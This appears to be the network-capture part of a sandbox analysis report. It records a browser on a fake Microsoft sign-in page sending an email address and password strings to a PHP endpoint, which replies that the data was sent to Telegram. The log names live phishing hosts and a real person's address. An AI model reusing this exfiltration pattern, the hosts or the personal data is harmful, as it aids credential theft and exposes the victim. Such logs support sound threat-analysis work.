                                                                                                                                                    2025-01-08 08:53:05 UTC513INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 31 38 2c 31 31 2e 35 37 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37 38 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 39 34 34 2c 37 2e 30 35 36 6c 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37
                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.57


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    15192.168.2.449762152.199.21.1754433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:05 UTC679OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                                                                                    Host: aadcdn.msftauth.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:05 UTC737INHTTP/1.1 200 OK
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                    Age: 7278486
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:05 GMT
                                                                                                                                                    Etag: 0x8D7B007297AE131
                                                                                                                                                    Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT
                                                                                                                                                    Server: ECAcc (lhc/7886)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                    x-ms-request-id: 53477596-701e-00df-0778-1fca5d000000
                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                    Content-Length: 1864
                                                                                                                                                    Connection: close
                                                                                                                                                    2025-01-08 08:53:05 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    16192.168.2.449768152.199.21.1754433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:06 UTC419OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                                                                                    Host: aadcdn.msftauth.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:06 UTC737INHTTP/1.1 200 OK
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                    Age: 7278487
                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                    Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:06 GMT
                                                                                                                                                    Etag: 0x8D7B007297AE131
                                                                                                                                                    Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT
                                                                                                                                                    Server: ECAcc (lhc/7886)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                    x-ms-request-id: 53477596-701e-00df-0778-1fca5d000000
                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                    Content-Length: 1864
                                                                                                                                                    Connection: close
                                                                                                                                                    2025-01-08 08:53:06 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    17192.168.2.449782172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:17 UTC748OUTPOST /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 70
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:17 UTC70OUTData Raw: 69 73 61 64 6f 73 61 3d 6d 61 74 74 68 69 65 75 2e 62 69 65 6e 73 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d 38 43 56 30 44 67 25 35 44 25 32 34 70 4c 25 32 42 70 62 55 25 37 44
                                                                                                                                                    Data Ascii: isadosa=matthieu.biens%40rockwool.com&gtagolas=8CV0Dg%5D%24pL%2BpbU%7D
                                                                                                                                                    2025-01-08 08:53:18 UTC1154INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:18 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Set-Cookie: PHPSESSID=ppueu6n8igkroa4cft9j59uvc0; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aV7jqXl3FoDSI%2BsK2vW%2BuoHWADY3sLRWK5TyOkJmAhVyYUF50WHxUz0AfBptFBzMzE7Lrbe%2FitURl9Hpw71NUAXqhci31PWdZ%2FJNXYX8bJfrgzdfeWOrEX8fc92ISiClqK4nTeKmvCSl98f13qeDag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf4d2d9014313-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1722&rtt_var=650&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1418&delivery_rate=1679125&cwnd=252&unsent_bytes=0&cid=6cfc23afd8351feb&ts=458&x=0"
                                                                                                                                                    2025-01-08 08:53:18 UTC51INData Raw: 32 64 0d 0a 44 61 74 61 20 73 61 76 65 64 20 61 6e 64 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                    Data Ascii: 2dData saved and sent to Telegram successfully!
                                                                                                                                                    2025-01-08 08:53:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    18192.168.2.449784172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:19 UTC366OUTGET /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:20 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:19 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Set-Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rD9rkUExrXM5C4aYBg3uP997RlthAf7rGoMgnd9PSJsBFNsEZdmkbu3XP2hvolL%2FhkBSny5nT%2BHB2frBBx4vKjdpwqrMzZC%2BqnPX2uD08%2FLR%2BepF4yv99ftd3Yuh0jlregfW2ecl%2FqvbU%2Bl%2FTHKmZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf4de3bb3c466-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1487&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=944&delivery_rate=1963685&cwnd=219&unsent_bytes=0&cid=3daaedbe07f13d6e&ts=422&x=0"
                                                                                                                                                    2025-01-08 08:53:20 UTC41INData Raw: 32 33 0d 0a 49 6e 76 61 6c 69 64 20 65 6d 61 69 6c 20 6f 72 20 70 61 73 73 77 6f 72 64 20 69 73 20 65 6d 70 74 79 2e 0d 0a
                                                                                                                                                    Data Ascii: 23Invalid email or password is empty.
                                                                                                                                                    2025-01-08 08:53:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    19192.168.2.449786172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:29 UTC748OUTPOST /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 47
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:29 UTC47OUTData Raw: 69 73 61 64 6f 73 61 3d 6d 61 74 74 68 69 65 75 2e 62 69 65 6e 73 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d
                                                                                                                                                    Data Ascii: isadosa=matthieu.biens%40rockwool.com&gtagolas=
                                                                                                                                                    2025-01-08 08:53:29 UTC1164INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:29 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Set-Cookie: PHPSESSID=i8paa2lejse42tuq8gm18ggdt2; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L6PtUO7%2FS2ywkfYyfLgVpY1ixmelWcgf4IGHQ8bmigYt1DGD6Mi%2Bh0BQeUUbU%2BBkUqVn5Y%2BVs82%2BStPcXCcy%2B3aebeBLQEQC5m%2Fjl488brfCOP5%2Bbnoua2kD9olAZtC4P5vWmoEVJAY%2BmU7op0n0iA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf51bb99f4229-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1602&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=1395&delivery_rate=1779402&cwnd=236&unsent_bytes=0&cid=ea7c132edb592c9b&ts=422&x=0"
                                                                                                                                                    2025-01-08 08:53:29 UTC41INData Raw: 32 33 0d 0a 49 6e 76 61 6c 69 64 20 65 6d 61 69 6c 20 6f 72 20 70 61 73 73 77 6f 72 64 20 69 73 20 65 6d 70 74 79 2e 0d 0a
                                                                                                                                                    Data Ascii: 23Invalid email or password is empty.
                                                                                                                                                    2025-01-08 08:53:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    20192.168.2.449788172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:30 UTC412OUTGET /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
                                                                                                                                                    2025-01-08 08:53:31 UTC1095INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:31 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuQiNIXmKGaXxQNOzUWvbRK%2FHqJZXhg9raoSFTqOl8WL8bK6bCvqOIL1K%2BcBwRpfH5e2U5bKhjv8870voyBFKoMQUaikaBL8feD%2BMV6mIa6PqQilYzg2I5oMEwzMLSBsRFOY0%2F9mv8c0OWsP4RYM2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf5246dec7d0c-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1800&rtt_var=698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=990&delivery_rate=1540897&cwnd=156&unsent_bytes=0&cid=11a9d961be596ac7&ts=402&x=0"
                                                                                                                                                    2025-01-08 08:53:31 UTC41INData Raw: 32 33 0d 0a 49 6e 76 61 6c 69 64 20 65 6d 61 69 6c 20 6f 72 20 70 61 73 73 77 6f 72 64 20 69 73 20 65 6d 70 74 79 2e 0d 0a
                                                                                                                                                    Data Ascii: 23Invalid email or password is empty.
                                                                                                                                                    2025-01-08 08:53:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    21192.168.2.449790172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:38 UTC748OUTPOST /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 72
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:38 UTC72OUTData Raw: 69 73 61 64 6f 73 61 3d 6d 61 74 74 68 69 65 75 2e 62 69 65 6e 73 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d 25 32 34 59 59 6e 71 25 33 43 53 41 6d 59 77 75 42 25 33 43 2e 70 25 37 43
                                                                                                                                                    Data Ascii: isadosa=matthieu.biens%40rockwool.com&gtagolas=%24YYnq%3CSAmYwuB%3C.p%7C
                                                                                                                                                    2025-01-08 08:53:38 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Set-Cookie: PHPSESSID=118mr3aqll13cj4rc9c3bmus25; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l0hwP5MFcsjtWimnTb%2B%2BeNCce5vUU6QlSKUrz%2FLWeNeHbyKAD69cRgngqwCsxx0aXftA4GpKO%2BjG1wfzW2H%2B4q6xA7%2FrK%2BwVwgwWSdGQ%2BjiJyQ0q6DA0KQbPTDs2CJp7AnYafAfVh0sZUfOJoN1YWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf5533a2441f9-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1622&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1420&delivery_rate=1698662&cwnd=216&unsent_bytes=0&cid=d414abe2002f7bf2&ts=482&x=0"
                                                                                                                                                    2025-01-08 08:53:38 UTC51INData Raw: 32 64 0d 0a 44 61 74 61 20 73 61 76 65 64 20 61 6e 64 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                    Data Ascii: 2dData saved and sent to Telegram successfully!
                                                                                                                                                    2025-01-08 08:53:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    22192.168.2.449792172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:39 UTC412OUTGET /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
